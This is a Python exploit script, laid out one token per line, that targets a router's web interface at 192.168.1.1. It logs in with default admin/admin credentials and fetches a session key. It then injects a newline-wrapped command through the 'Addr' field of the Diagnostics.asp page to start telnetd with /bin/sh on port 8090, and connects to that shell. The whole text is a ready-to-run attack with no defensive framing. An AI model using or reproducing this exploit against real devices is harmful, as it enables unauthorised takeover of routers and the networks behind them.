import
requests
import
urllib
import
os
from
time
import
sleep
from
urllib.parse
import
unquote
server
=
"192.168.1.1"
main_url
=
"http://192.168.1.1:80"
headers
=
{
"User-Agent"
:
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
,
}
def
login():
s
=
requests.Session()
s.verify
=
False
url
=
main_url
+
"/cgi-bin/Login.asp?User=admin&Pwd=admin&_=1690122728925"
resp
=
s.get(url,headers
=
headers,timeout
=
10
)
print
(resp.text)
def
get_session_key():
s
=
requests.Session()
s.verify
=
False
url
=
main_url
+
"/cgi-bin/get/New_GUI/get_sessionKey.asp"
resp
=
s.get(url,headers
=
headers,timeout
=
10
)
sessionKey
=
resp.text
print
(sessionKey)
return
sessionKey
def
exp(sessionKey
=
None
):
cmd
=
"%0autelnetd -p 8090 -l /bin/sh%0a"
s
=
requests.Session()
s.verify
=
False
params
=
{
"Type"
:
"p"
,
"sessionKey"
:urllib.parse.unquote(sessionKey),
"Addr"
:urllib.parse.unquote(cmd)}
url
=
main_url
+
"/cgi-bin/New_GUI/Set/Diagnostics.asp"
resp
=
s.post(url,data
=
params,headers
=
headers,timeout
=
100000
)
print
(resp.text)
if
__name__
=
=
'__main__'
:
print
(
"\n[*] Connection "
,main_url);
login()
print
(
"[*] Getting session key"
)
sessionKey
=
get_session_key()
print
(
"[*] Sending payload"
)
exp(sessionKey
=
sessionKey)
print
(
"[*] Running Telnetd Service"
)
print
(
"[*] Opening Telnet Connection\n"
)
sleep(
3
)
os.system(
'telnet '
+
str
(server)
+
' 8090'
)